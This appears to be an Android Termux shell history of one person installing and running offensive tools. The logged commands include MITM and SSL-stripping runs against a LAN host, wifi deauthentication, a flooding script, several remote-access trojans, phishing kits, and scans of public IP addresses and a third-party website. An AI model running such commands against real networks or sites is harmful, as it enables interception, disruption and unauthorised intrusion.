- cmd: са
  when: 1502524957
- cmd: chown -R u0_a1037 MITMf/
  when: 1502525000
  paths:
    - MITMf/
- cmd: cd MITMf/
  when: 1502525077
  paths:
    - MITMf/
- cmd: chown -R u0_a1037 bin
  when: 1502525085
  paths:
    - bin
- cmd: chown -R u0_a1037 bin/
  when: 1502525089
  paths:
    - bin/
- cmd: chmod -R u0_a1037 +rwx bin
  when: 1502525143
  paths:
    - bin
- cmd: chown u0_a1037 bin/
  when: 1502525343
  paths:
    - bin/
- cmd: rm -rf MITMf/
  when: 1502525375
  paths:
    - MITMf/
- cmd: ls -all
  when: 1502525387
- cmd: rm -rf exploit-database/
  when: 1502525685
  paths:
    - exploit-database/
- cmd: python2 rsf.py 
  when: 1502526102
  paths:
    - rsf.py
- cmd: python rsf.py 
  when: 1502526107
  paths:
    - rsf.py
- cmd: pip2 install request
  when: 1502526135
- cmd: pip2 install requests
  when: 1502526175
- cmd: pip2 install Twisted
  when: 1502533368
- cmd: pip2 install StrippingProxy
  when: 1502533551
- cmd: pip install StrippingProxy
  when: 1502533561
- cmd: pip2 install service_identity
  when: 1502533901
- cmd: pip2 install user_agent
  when: 1502533980
- cmd: pip2 install user_agents
  when: 1502533996
- cmd: pkg install openssl-tools
  when: 1502534055
- cmd: pkg install openssl
  when: 1502534059
- cmd: pkg install openssl-dev
  when: 1502534064
- cmd: pkg install libssl
  when: 1502534176
- cmd: pkg install libssl-dev
  when: 1502534182
- cmd: pkg search libssl
  when: 1502534190
- cmd: pip2 install pyopenssl
  when: 1502534217
- cmd: pip install pyopenssl
  when: 1502534228
- cmd: pip2 install sslstrip.StrippingProxy
  when: 1502534427
- cmd: pkg uninstall sslstrip
  when: 1502534458
- cmd: git clone https://github.com/moxie0/sslstrip
  when: 1502534473
- cmd: cd sslstrip/
  when: 1502534485
  paths:
    - sslstrip/
- cmd: pip2 install python-twisted-web
  when: 1502534508
- cmd: pip install python-twisted-web
  when: 1502534519
- cmd: sslstrip -h
  when: 1502534580
- cmd: rm -rf sslstrip/
  when: 1502534590
  paths:
    - sslstrip/
- cmd: sslstrip -l 2000
  when: 1502534611
- cmd: bettercap -X --proxy -T 192.168.0.104
  when: 1502534972
- cmd: bettercap -X -T 192.168.0.104 --proxy-port 8080
  when: 1502535125
- cmd: bettercap -X -T 192.168.0.104 --proxy-port
  when: 1502535167
- cmd: bettercap -X -T 192.168.0.104 --proxy
  when: 1502535288
- cmd: bettercap -X --proxy
  when: 1502535363
- cmd: bettercap -X -T 192.168.0.104
  when: 1502535393
- cmd: sudo rm -rf sslstrip.log 
  when: 1502535569
  paths:
    - sslstrip.log
- cmd: pip3 install mitmproxy
  when: 1502535592
- cmd: bettercap -T 192.168.0.104
  when: 1502536293
- cmd: mitmproxy
  when: 1502536440
- cmd: pkg install python3-dev
  when: 1502536496
- cmd: pip3 install brotli
  when: 1502536736
- cmd: pip3 install brotli-dev
  when: 1502536890
- cmd: pip install brotli
  when: 1502536903
- cmd: pkg search ffi
  when: 1502537058
- cmd: pip3 install ffi
  when: 1502537156
- cmd: export LD_LIBRARY_PATH
  when: 1502537382
- cmd: pip2 install brotlipy
  when: 1502547879
- cmd: pip3 install brotlipy
  when: 1502547891
- cmd: pip install brotlipy
  when: 1502547906
- cmd: mitmproxy -h
  when: 1502547913
- cmd: pip3 uninstall mitmproxy
  when: 1502547978
- cmd: pip uninstall mitmproxy
  when: 1502548036
- cmd: pip2 uninstall mitmproxy
  when: 1502548052
- cmd: bettercap -T 192.168.0.104 -X --proxy-https
  when: 1502549324
- cmd: bettercap -T 192.168.0.104 -X -proxy
  when: 1502549670
- cmd: service postgresql start
  when: 1502556424
- cmd: pkg install service
  when: 1502556449
- cmd: postgres -h
  when: 1502556582
- cmd: postgres 
  when: 1502556587
- cmd: postgres
  when: 1502556604
- cmd: postgres -D
  when: 1502556618
- cmd: postgres --help
  when: 1502556626
- cmd: packages install postgresql
  when: 1502556796
- cmd: postgresql-contribut
  when: 1502556840
- cmd: initdb ~/pg
  when: 1502557538
- cmd: pgctl -D ~/pg start
  when: 1502557559
- cmd: pg_ctl -D $PREFIX/var/lib/postgresql start
  when: 1502557567
- cmd: ruby msfconsole 
  when: 1502557976
  paths:
    - msfconsole
- cmd: chown u0_a1037 metasploit-framework/
  when: 1502558555
  paths:
    - metasploit-framework/
- cmd: chmod -R +rwx metasploit-framework/
  when: 1502558570
  paths:
    - metasploit-framework/
- cmd: chown u0_a1037 -R /data/data/com.termux/files/usr/lib/ruby
  when: 1502558686
  paths:
    - /data/data/com.termux/files/usr/lib/ruby
- cmd: chown u0_a1037 -R metasploit-framework/config
  when: 1502558730
  paths:
    - metasploit-framework/config
- cmd: chown u0_a1037 -R metasploit-framework/config/
  when: 1502558734
  paths:
    - metasploit-framework/config/
- cmd: chown u0_a1037 -R metasploit-framework/
  when: 1502558839
  paths:
    - metasploit-framework/
- cmd: chmod -R +rwx /data/data/com.termux/files/usr/lib/ruby/
  when: 1502558997
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/
- cmd: chown u0_a1037 .msf4/
  when: 1502559020
  paths:
    - .msf4/
- cmd: chmod -R +rwx /data/data/com.termux/files/usr/lib/ruby/2.4.0/fiddle.rb
  when: 1502559156
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/2.4.0/fiddle.rb
- cmd: chown u0_a1037 u0_a1037 .msf4/
  when: 1502559176
  paths:
    - .msf4/
- cmd: chown -h
  when: 1502559191
- cmd: chown --help
  when: 1502559197
- cmd: cat /etc/passwd
  when: 1502559422
- cmd: pkg install procps
  when: 1502559472
- cmd: pkg install man
  when: 1502559489
- cmd: w
  when: 1502559506
- cmd: last -a
  when: 1502559531
- cmd: id
  when: 1502559572
- cmd: id -g
  when: 1502559600
- cmd: id frag
  when: 1502559607
- cmd: chown u0_a1037:u0_a1037 .msf4/
  when: 1502559838
  paths:
    - .msf4/
- cmd: chown u0_a1037:u0_a1037 -R metasploit-framework/
  when: 1502559882
  paths:
    - metasploit-framework/
- cmd: chmod +rwx /data/data/com.termux/files/usr/lib/ruby/2.4.0/fiddle.rb
  when: 1502560095
  paths:
    - /data/data/com.termux/files/usr/lib/ruby/2.4.0/fiddle.rb
- cmd: services
  when: 1502560647
- cmd: service
  when: 1502560652
- cmd: psql postgres
  when: 1502560682
- cmd: termux-chroot 
  when: 1502604501
- cmd: gem install rbnacl-libsodium
  when: 1502604530
- cmd: netstat -atpn
  when: 1502609022
- cmd: rm -rf .msf4/ & .msfdb/ & msfu/
  when: 1502609958
  paths:
    - .msf4/
- cmd: rm -rf msfu/
  when: 1502609994
  paths:
    - msfu/
- cmd: rm -rf .rsf_history 
  when: 1502610018
  paths:
    - .rsf_history
- cmd: rm -rf .psql__history 
  when: 1502610034
- cmd: rm -rf .psql__history
  when: 1502610057
- cmd: mkdir ~/.msfdb & initdb ~/.msfdb & pg_ctl -D ~/.msfdb -l ~/.msfdb/msfdb.log start & createuser msf & createdb msfdb & pg_ctl -D ~/.msfdb -l ~/.msfdb/msfdb.log stop
  when: 1502610076
- cmd: cd pg
  when: 1502612202
  paths:
    - pg
- cmd: lw
  when: 1502612204
- cmd: rm -rf pg
  when: 1502612242
  paths:
    - pg
- cmd: apt install autoconf bison clang coreutils curl findutils git apr apr-util libffi-dev libgmp-dev libpcap-dev postgresql-dev readline-dev libsqlite-dev openssl-dev libtool libxml2-dev libxslt-dev ncurses-dev pkg-config postgresql-contrib wget make ruby-dev libgrpc-dev termux-tools ncurses-utils ncurses
  when: 1502613554
- cmd: cd .bundle/
  when: 1502613911
  paths:
    - .bundle/
- cmd: cd cache/compact_index/rubygems.org.443.29b0360b937aa4d161703e6160654e47/
  when: 1502613927
  paths:
    - cache/compact_index/rubygems.org.443.29b0360b937aa4d161703e6160654e47/
- cmd: cd .bundle/cache/compact_index/rubygems.org.443.29b0360b937aa4d161703e6160654e47/
  when: 1502614011
  paths:
    - .bundle/cache/compact_index/rubygems.org.443.29b0360b937aa4d161703e6160654e47/
- cmd: rm -rf .gem/
  when: 1502614080
  paths:
    - .gem/
- cmd: rm -rf .bundle/
  when: 1502614089
  paths:
    - .bundle/
- cmd: $PREFIX/bin/find -type f -executable -exec termux-fix-shebang {} 
  when: 1502620116
- cmd: os
  when: 1502620185
- cmd: git clone https://github.com/aircrack-ng/aircrack-ng
  when: 1502620338
- cmd: cd aircrack-ng/
  when: 1502620404
  paths:
    - aircrack-ng/
- cmd: pkg install libnl1
  when: 1502620447
- cmd: pkg install libnl
  when: 1502620453
- cmd: pkg install libnl-dev
  when: 1502620463
- cmd: cdcd
  when: 1502620607
- cmd: rm -rf aircrack-ng/
  when: 1502620619
  paths:
    - aircrack-ng/
- cmd: bettercap -T --proxy 192.168.0.104 -X
  when: 1502620745
- cmd: bettercap --proxy -T 192.168.0.104 -X
  when: 1502620771
- cmd: bettercap uninstall
  when: 1502621064
- cmd: rm -rf .bettercap/
  when: 1502621124
  paths:
    - .bettercap/
- cmd: git clone https://github.com/evilsocket/bettercap
  when: 1502621223
- cmd: cd bettercap/
  when: 1502621264
  paths:
    - bettercap/
- cmd: rm -rf /data/data/com.termux/files/usr/bin/bettercap 
  when: 1502621321
  paths:
    - /data/data/com.termux/files/usr/bin/bettercap
- cmd: gem install bettercap
  when: 1502621330
  paths:
    - bettercap
- cmd: bettercap -h
  when: 1502621362
- cmd: bettercap -T 192.168.0.104 -X --proxy
  when: 1502621385
- cmd: rm -rf bettercap/
  when: 1502621437
  paths:
    - bettercap/
- cmd: git clone https://github.com/Ettercap/ettercap
  when: 1502621463
- cmd: cd ettercap/
  when: 1502621864
  paths:
    - ettercap/
- cmd: mkdir build
  when: 1502621881
- cmd: cd build/
  when: 1502621884
  paths:
    - build/
- cmd: pkg install cmake
  when: 1502621933
- cmd: cmake ..
  when: 1502622012
  paths:
    - ..
- cmd: make install
  when: 1502622083
- cmd: pkg uninstall cmake
  when: 1502622099
- cmd: rm -rf ettercap/
  when: 1502622725
  paths:
    - ettercap/
- cmd: chmod +rmx intercepter_linux
  when: 1502640876
  paths:
    - intercepter_linux
- cmd: chown u0_a1037:u0_a1037 -R Intercepter-NG.CE.05/
  when: 1502641011
  paths:
    - Intercepter-NG.CE.05/
- cmd: chmod +rwx Intercepter-NG.CE.05/
  when: 1502641027
  paths:
    - Intercepter-NG.CE.05/
- cmd: cd Intercepter-NG.CE.05/
  when: 1502641064
  paths:
    - Intercepter-NG.CE.05/
- cmd: chmod a+x intercepter_linux
  when: 1502641157
  paths:
    - intercepter_linux
- cmd: ./intercepter_linux
  when: 1502641197
- cmd: chmod a+x intercepter_bsd
  when: 1502641231
  paths:
    - intercepter_bsd
- cmd: ./intercepter_bsd
  when: 1502641244
- cmd: chmod a+x intercepter_android 
  when: 1502641275
  paths:
    - intercepter_android
- cmd: ./intercepter_android 
  when: 1502641285
- cmd: rm -rf Intercepter-NG.CE.05/
  when: 1502641306
  paths:
    - Intercepter-NG.CE.05/
- cmd: git clone https://github.com/LionSec/xerosploit
  when: 1502643251
- cmd: git clone https://github.com/4shadoww/hakkuframework
  when: 1502643280
- cmd: le
  when: 1502643411
- cmd: ./install 
  when: 1502643419
- cmd: python install 
  when: 1502643519
  paths:
    - install
- cmd: python hakku
  when: 1502643529
  paths:
    - hakku
- cmd: sudo python install.py
  when: 1502643650
  paths:
    - install.py
- cmd: sudo python2 install.py
  when: 1502643656
  paths:
    - install.py
- cmd: sudo xer
  when: 1502644195
- cmd: sudo xerosploit.py
  when: 1502644207
  paths:
    - xerosploit.py
- cmd: ./xerosploit.py 
  when: 1502644238
- cmd: pip2 install terminaltables
  when: 1502644273
- cmd: pip2 install tabulate
  when: 1502644310
- cmd: python2 install.py
  when: 1502644374
  paths:
    - install.py
- cmd: pkg install build-essential
  when: 1502644438
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/lib/apt/
  when: 1502644595
  paths:
    - /data/data/com.termux/files/usr/lib/apt/
- cmd: chmod +rwx /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
  when: 1502644645
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
- cmd: chown u0_a1037:u0_a1037 -R /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
  when: 1502644683
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
- cmd: chmod a+rwx /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
  when: 1502644775
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
- cmd: chmod -R a+x partial/
  when: 1502645060
  paths:
    - partial/
- cmd: chmod -R a+rwx partial/
  when: 1502645119
  paths:
    - partial/
- cmd: cd partial/
  when: 1502645124
  paths:
    - partial/
- cmd: cd /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
  when: 1502645222
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
- cmd: chmod a+rwx termux.net_dists_stable_main_binary-all_Packages.xz 
  when: 1502645266
  paths:
    - termux.net_dists_stable_main_binary-all_Packages.xz
- cmd: chmod a+rwx apt/
  when: 1502645330
  paths:
    - apt/
- cmd: su -c rm /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease 
  when: 1502645381
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease
- cmd: su -c rm /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
  when: 1502645415
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/partial/
- cmd: su -c rm /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease
  when: 1502645639
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease
- cmd: cd /data/data/com.termux/files/usr/var/lib/apt/lists/
  when: 1502645711
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/
- cmd: chown u0_a1037:u0_a1037 -R termux.net_dists_stable_InRelease
  when: 1502645744
  paths:
    - termux.net_dists_stable_InRelease
- cmd: chown u0_a1037:u0_a1037 -R termux.net_dists_stable_main_binary-all_Packages 
  when: 1502645759
  paths:
    - termux.net_dists_stable_main_binary-all_Packages
- cmd: chown u0_a1037:u0_a1037 -R termux.net_dists_stable_main_binary-arm_Packages 
  when: 1502645767
  paths:
    - termux.net_dists_stable_main_binary-arm_Packages
- cmd: chmod a+rwx termux.net_dists_stable_main_binary-all_Packages
  when: 1502645784
- cmd: chmod a+rwx termux.net_dists_stable_InRelease 
  when: 1502645803
  paths:
    - termux.net_dists_stable_InRelease
- cmd: chmod a+rwx termux.net_dists_stable_main_binary-arm_Packages
  when: 1502645811
  paths:
    - termux.net_dists_stable_main_binary-arm_Packages
- cmd: cd xerosploit/
  when: 1502645898
  paths:
    - xerosploit/
- cmd: python2 xerosploit.py 
  when: 1502645914
  paths:
    - xerosploit.py
- cmd: rm -rf xerosploit/
  when: 1502645942
  paths:
    - xerosploit/
- cmd: wget https://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
  when: 1502646005
- cmd: tar xvfz dsniff-2.3.tar.gz 
  when: 1502646104
  paths:
    - dsniff-2.3.tar.gz
- cmd: rm -rf dsniff-2.3.tar.gz 
  when: 1502646118
  paths:
    - dsniff-2.3.tar.gz
- cmd: ./configure
  when: 1502646136
- cmd: pip2 install berkely
  when: 1502646177
- cmd: pkg search berke;y
  when: 1502646191
- cmd: pkg search berkely
  when: 1502646196
- cmd: ./install-sh 
  when: 1502646207
- cmd: sh install-sh 
  when: 1502646212
  paths:
    - install-sh
- cmd: pkg search libdb
  when: 1502646295
- cmd: pkg install libdb
  when: 1502646303
- cmd: pkg install libdb-dev
  when: 1502646310
- cmd: sh configure
  when: 1502646328
  paths:
    - configure
- cmd: pip2 install berkely-db
  when: 1502646466
- cmd: cd dsniff-2.3/
  when: 1502646474
  paths:
    - dsniff-2.3/
- cmd: brew 
  when: 1502646565
- cmd: rm -rf dsniff-2.3/
  when: 1502646705
  paths:
    - dsniff-2.3/
- cmd: git clone https://github.com/dugsong/dsniff
  when: 1502646725
- cmd: ./setup.py 
  when: 1502646748
- cmd: dsniff/
  when: 1502646794
- cmd: python dsniff.py 
  when: 1502646823
  paths:
    - dsniff.py
- cmd: python2 dsniff.py 
  when: 1502646830
  paths:
    - dsniff.py
- cmd: python2 setup.py
  when: 1502646848
  paths:
    - setup.py
- cmd: cd hakkuframework/
  when: 1502646883
  paths:
    - hakkuframework/
- cmd: ./hakku 
  when: 1502646888
- cmd: python2 hakku 
  when: 1502646895
  paths:
    - hakku
- cmd: python hakku 
  when: 1502646960
  paths:
    - hakku
- cmd: cd dsniff/
  when: 1502647102
  paths:
    - dsniff/
- cmd: rm -rf dsniff/
  when: 1502647133
  paths:
    - dsniff/
- cmd: rm -rf hakkuframework/
  when: 1502647147
  paths:
    - hakkuframework/
- cmd: echo "alias routersploit='/root/routersploit/rsf.py'" >> ~/.bashrc
  when: 1502647283
- cmd: source ~/.bashrc 
  when: 1502647296
- cmd: routersploit/
  when: 1502647319
- cmd: ./rsf.py 
  when: 1502647325
- cmd: cd wifi-deauth/
  when: 1502647380
  paths:
    - wifi-deauth/
- cmd: ./wifi_deauth.py 
  when: 1502647386
- cmd: cd attack/
  when: 1502647399
  paths:
    - attack/
- cmd: python2 wifi_deauth.py 
  when: 1502647422
  paths:
    - wifi_deauth.py
- cmd: python2 wifi_deauth.py -i wlan0
  when: 1502647443
  paths:
    - wifi_deauth.py
- cmd: python2 wifi_deauth.py -i wlan0 -b 00:30:18:A6:66:11
  when: 1502647509
  paths:
    - wifi_deauth.py
- cmd: rm -rf wifi-deauth/
  when: 1502647520
  paths:
    - wifi-deauth/
- cmd: wpspin/
  when: 1502647529
- cmd: sh WPSPIN.sh 
  when: 1502647537
  paths:
    - WPSPIN.sh
- cmd: ./WPSPIN.sh 
  when: 1502647541
- cmd: bash WPSPIN.sh 
  when: 1502647548
  paths:
    - WPSPIN.sh
- cmd: npm 
  when: 1502647945
- cmd: pkg install nodejs
  when: 1502647955
- cmd: npm install gtop
  when: 1502648041
- cmd: npm install gtop -g
  when: 1502648054
- cmd: pkg search gtop
  when: 1502648115
- cmd: pkg uninstall npm
  when: 1502648200
- cmd: pkg uninstall nodejs
  when: 1502648210
- cmd: bash
  when: 1502648286
- cmd: pkg install xonsh
  when: 1502648448
- cmd: https://github.com/allfro/sploitego
  when: 1502651093
- cmd: git clone https://github.com/allfro/sploitego
  when: 1502651101
- cmd: cd sploite
  when: 1502651135
- cmd: cd sploitego/
  when: 1502651143
  paths:
    - sploitego/
- cmd: canari install-package sploitego
  when: 1502651995
- cmd: git clone https://github.com/H0nus/RogueSploit
  when: 1502652056
- cmd: cd RogueSploit/
  when: 1502652133
  paths:
    - RogueSploit/
- cmd: RogueSploit
  when: 1502652184
- cmd: ./RogueSploit
  when: 1502652195
- cmd: rm -rf RogueSploit/
  when: 1502652247
  paths:
    - RogueSploit/
- cmd: rm -rf sploitego/
  when: 1502652263
  paths:
    - sploitego/
- cmd: rm -rf npm-debug.log 
  when: 1502652280
  paths:
    - npm-debug.log
- cmd: git clone https://github.com/PowerScript/KatanaFramework.git
  when: 1502652457
- cmd: pkg install libusb1
  when: 1502652697
- cmd: pkg install libusb
  when: 1502652701
- cmd: pip2 install libusb1
  when: 1502652713
- cmd: ./ktf.console 
  when: 1502696708
- cmd: pip2 search libusb
  when: 1502696760
- cmd: pip2 search pylibusb
  when: 1502696797
- cmd: pip2 install pylibusb
  when: 1502696810
- cmd: cd KatanaFramework/
  when: 1502696831
  paths:
    - KatanaFramework/
- cmd: python2 ktf.console 
  when: 1502696833
  paths:
    - ktf.console
- cmd: python ktf.run 
  when: 1502696871
  paths:
    - ktf.run
- cmd: rm -rf KatanaFramework/
  when: 1502696894
  paths:
    - KatanaFramework/
- cmd: https://github.com/IFGHou/wapiti
  when: 1502697500
- cmd: git clone https://github.com/IFGHou/wapiti
  when: 1502697505
- cmd: cd wapiti/
  when: 1502697521
  paths:
    - wapiti/
- cmd: rm -rf wapiti/
  when: 1502697661
  paths:
    - wapiti/
- cmd: wapiti
  when: 1502697663
- cmd: git clone https://github.com/trustedsec/social-engineer-toolkit
  when: 1502698048
- cmd: apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php \\\n  python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl
  when: 1502736303
- cmd: bettercap -T 192.168.0.104 -X --proxy-http
  when: 1502776312
- cmd: bettercap -T 192.168.0.104 --proxy
  when: 1502780385
- cmd: bettercap -T 192.168.0.104 --proxy -P POST
  when: 1502780651
- cmd: bettercap -T 192.168.0.104 --proxy -X
  when: 1502780750
- cmd: bettercap -T 192.168.0.104 --proxy-http
  when: 1502780817
- cmd: git clone https://github.com/kgretzky/evilginx
  when: 1502784115
- cmd: cd evilginx/
  when: 1502784126
  paths:
    - evilginx/
- cmd: chmod 700 install.sh 
  when: 1502784148
  paths:
    - install.sh
- cmd: rm -rf evilginx/
  when: 1502784182
  paths:
    - evilginx/
- cmd: git clone https://github.com/stasinopoulos/jaidam
  when: 1502784285
- cmd: chmod 700 jaidam.py 
  when: 1502784303
  paths:
    - jaidam.py
- cmd: ./jaidam.py 
  when: 1502784322
- cmd: python jaidam.py 
  when: 1502784327
  paths:
    - jaidam.py
- cmd: git clone https://github.com/Ekultek/Dagon
  when: 1502784422
- cmd: ./dagon.py 
  when: 1502784441
- cmd: pip install requirements.txt 
  when: 1502784477
  paths:
    - requirements.txt
- cmd: python dagon.py 
  when: 1502784568
  paths:
    - dagon.py
- cmd: cd Dagon/
  when: 1502784659
  paths:
    - Dagon/
- cmd: cd jaidam/
  when: 1502784737
  paths:
    - jaidam/
- cmd: python2 jaidam.py 
  when: 1502784743
  paths:
    - jaidam.py
- cmd: rm -rf jaidam/
  when: 1502784821
  paths:
    - jaidam/
- cmd: rm -rf Dagon/
  when: 1502784828
  paths:
    - Dagon/
- cmd: apt update & apt install wget -y & /data/data/com.termux/files/usr/bin/wget https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.sh
  when: 1502785190
- cmd: sh termux-fedora.sh f25_arm
  when: 1502785217
  paths:
    - termux-fedora.sh
- cmd: dnf update
  when: 1502785595
- cmd: cd social-engineer-toolkit/
  when: 1502785614
  paths:
    - social-engineer-toolkit/
- cmd: python setoolkit 
  when: 1502785639
  paths:
    - setoolkit
- cmd: python2 setoolkit 
  when: 1502785644
  paths:
    - setoolkit
- cmd: tsu sh termux-fedora.sh uninstall
  when: 1502785753
  paths:
    - termux-fedora.sh
- cmd: sh termux-fedora.sh uninstall
  when: 1502785805
  paths:
    - termux-fedora.sh
- cmd: sh termux-fedora.sh
  when: 1502785815
  paths:
    - termux-fedora.sh
- cmd: sh termux-fedora.sh f25_arm uninatallh
  when: 1502785835
  paths:
    - termux-fedora.sh
- cmd: sh termux-fedora.sh f25_arm uninstall
  when: 1502785855
  paths:
    - termux-fedora.sh
- cmd: sudo sh termux-fedora.sh uninstall
  when: 1502785869
  paths:
    - termux-fedora.sh
- cmd: /data/data/com.termux/files/usr/tmp/fish.1
  when: 1502785917
- cmd: nmap -sn -T5 192.168.0.1
  when: 1502790988
- cmd: nmap -sn -T5 192.168.0.1 -sP
  when: 1502791002
- cmd: nmap -sV 192.168.0.1
  when: 1502791078
- cmd: git clone https://github.com/sweetsoftware/Ares
  when: 1502805873
- cmd: git clone https://github.com/cyweb/hammer
  when: 1502806144
- cmd: rm -rf fedora/
  when: 1502806202
  paths:
    - fedora/
- cmd: rm -rf social-engineer-toolkit/
  when: 1502806208
  paths:
    - social-engineer-toolkit/
- cmd: rm -rf termux-fedora.sh 
  when: 1502806219
  paths:
    - termux-fedora.sh
- cmd: git clone https://github.com/vesche/basicRAT
  when: 1502806293
- cmd: LS
  when: 1502806363
- cmd: cd ba
  when: 1502806373
- cmd: pip2 install Crypto
  when: 1502806425
- cmd: pip3 instll Crypto
  when: 1502806489
- cmd: pip3 install Crypto
  when: 1502806498
- cmd: pip2 install pycrypto
  when: 1502806584
- cmd: rm -rf /data/data/com.termux/files/usr/tmp/fish.1
  when: 1502810508
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.1
- cmd: chmod 700 hammer.py 
  when: 1502810545
  paths:
    - hammer.py
- cmd: ./hammer.py 
  when: 1502810548
- cmd: python3 hammer.py 
  when: 1502810555
  paths:
    - hammer.py
- cmd: python3 hammer.py -h
  when: 1502810566
  paths:
    - hammer.py
- cmd: python3 hammer.py -s 192.168.0.1 -p 80 -t
  when: 1502810601
  paths:
    - hammer.py
- cmd: python3 hammer.py -s 192.168.0.1 -p 80 -t 135
  when: 1502810606
  paths:
    - hammer.py
- cmd: chmod 700 basicRAT_client.py 
  when: 1502810682
  paths:
    - basicRAT_client.py
- cmd: chmod 700 basicRAT_server.py 
  when: 1502810688
  paths:
    - basicRAT_server.py
- cmd: ./basicRAT_server.py 
  when: 1502810692
- cmd: python basicRAT_client.py 
  when: 1502810697
  paths:
    - basicRAT_client.py
- cmd: python2 basicRAT_client.py 
  when: 1502811508
  paths:
    - basicRAT_client.py
- cmd: python2 basicRAT_server.py 
  when: 1502811751
  paths:
    - basicRAT_server.py
- cmd: chmod 700 server.py 
  when: 1502811880
  paths:
    - server.py
- cmd: ./server.py 
  when: 1502811886
- cmd: sh rm -rf /data/data/com.termux/files/usr/tmp/fish.1
  when: 1503384730
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.1
- cmd: su rm -rf /data/data/com.termux/files/usr/tmp/fish.1
  when: 1503384741
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.1
- cmd: su rm -rf /data/data/com.termux/files/usr/tmp/fish.u0_a1037/
  when: 1503384767
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.u0_a1037/
- cmd: fish
  when: 1503384771
- cmd: su rm -rf /data/data/com.termux/files/usr/tmp/fish.root
  when: 1503384783
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.root
- cmd: cd Ares/
  when: 1503384846
  paths:
    - Ares/
- cmd: cd server/
  when: 1503384869
  paths:
    - server/
- cmd: python db_init.py 
  when: 1503384879
  paths:
    - db_init.py
- cmd: python2 db_init.py 
  when: 1503384885
  paths:
    - db_init.py
- cmd: python server.py 
  when: 1503384983
  paths:
    - server.py
- cmd: python2 server.py 
  when: 1503384989
  paths:
    - server.py
- cmd: rm -rf Ares/
  when: 1503384997
  paths:
    - Ares/
- cmd: cd basicRAT/
  when: 1503385004
  paths:
    - basicRAT/
- cmd: rm -rf basicRAT/
  when: 1503385147
  paths:
    - basicRAT/
- cmd: cd pupy/
  when: 1503385364
  paths:
    - pupy/
- cmd: git submodule init
  when: 1503385380
- cmd: git submodule update
  when: 1503385392
- cmd: ./pupysh.py 
  when: 1503396903
- cmd: pkg list-all mb
  when: 1503465127
- cmd: pkg list-all -al
  when: 1503465137
- cmd: pkg list-all -all
  when: 1503465141
- cmd: pkg list-all -h
  when: 1503465158
- cmd: autoremove
  when: 1503465226
- cmd: apt autoremove
  when: 1503465246
- cmd: clear
  when: 1503465337
- cmd: netcfg
  when: 1503465830
- cmd: iw
  when: 1503466815
- cmd: iwconfig
  when: 1503466826
- cmd: ifconfig wlan0 down
  when: 1503466871
- cmd: ifconfig wlan0 up
  when: 1503466882
- cmd: pkg search libnl
  when: 1503466978
- cmd: git clone http://git.sipsolutions.net/iw.git
  when: 1503467035
- cmd: cd iw/
  when: 1503467054
  paths:
    - iw/
- cmd: export LIBNL=your_libnl_path
  when: 1503467058
- cmd: $patch Makefile iw.patch
  when: 1503467078
  paths:
    - Makefile
- cmd: patch Makefile iw.patch
  when: 1503467088
  paths:
    - Makefile
- cmd: rm -rf iw/
  when: 1503467185
  paths:
    - iw/
- cmd: nmap -sV 178.72.173.152
  when: 1503476872
- cmd: nmap -O 178.72.173.152
  when: 1503477026
- cmd: nmap 178.72.173.152:80
  when: 1503477081
- cmd: nmap 178.72.173.152:8080
  when: 1503477088
- cmd: nmap 178.72.173.152
  when: 1503477212
- cmd: nmap 178.72.173.152 -sV
  when: 1503477711
- cmd: nmap -A 178.72.173.152
  when: 1503477808
- cmd: nmap -A 178.72.173.82
  when: 1503477976
- cmd: nmap 178.72.173.82
  when: 1503478002
- cmd: nmap 178.72.173.227
  when: 1503478093
- cmd: nmap 178.72.173.227 -A
  when: 1503478137
- cmd: nmap 192.168.0.1
  when: 1503478211
- cmd: nmap 192.168.0.1-200
  when: 1503478231
- cmd: nmap 192.168.0.100-113 -O
  when: 1503478998
- cmd: exi
  when: 1503479364
- cmd: pip install -r requirements.txt 
  when: 1503508420
  paths:
    - requirements.txt
- cmd: pip install pynacl
  when: 1503508504
- cmd: git clone https://github.com/wpscanteam/wpscan.git
  when: 1503514500
- cmd: cd wpspin/
  when: 1503514627
  paths:
    - wpspin/
- cmd: cd wpscan/
  when: 1503514636
  paths:
    - wpscan/
- cmd: ./wpscan.rb 
  when: 1503514644
- cmd: gem install bundler & bundle install --without test
  when: 1503514684
- cmd: ruby wpscan.rb 
  when: 1503514737
  paths:
    - wpscan.rb
- cmd: ruby wpscan.rb -h
  when: 1503514756
  paths:
    - wpscan.rb
- cmd: ruby wpscan.rb -u howtomakeall.esy.es
  when: 1503514797
  paths:
    - wpscan.rb
- cmd: rm -rf data.zip 
  when: 1503514867
  paths:
    - data.zip
- cmd: ruby wpscan.rb --url howtomakeall.esy.es
  when: 1503514927
  paths:
    - wpscan.rb
- cmd: ruby wpscan.rb --update
  when: 1503514967
  paths:
    - wpscan.rb
- cmd: rm -rf wpscan/
  when: 1503515058
  paths:
    - wpscan/
- cmd: git clone https://github.com/fbctf/shodanwave.git
  when: 1503515305
- cmd: ./shodanwave.py 
  when: 1503515318
- cmd: python shodanwave.py 
  when: 1503515402
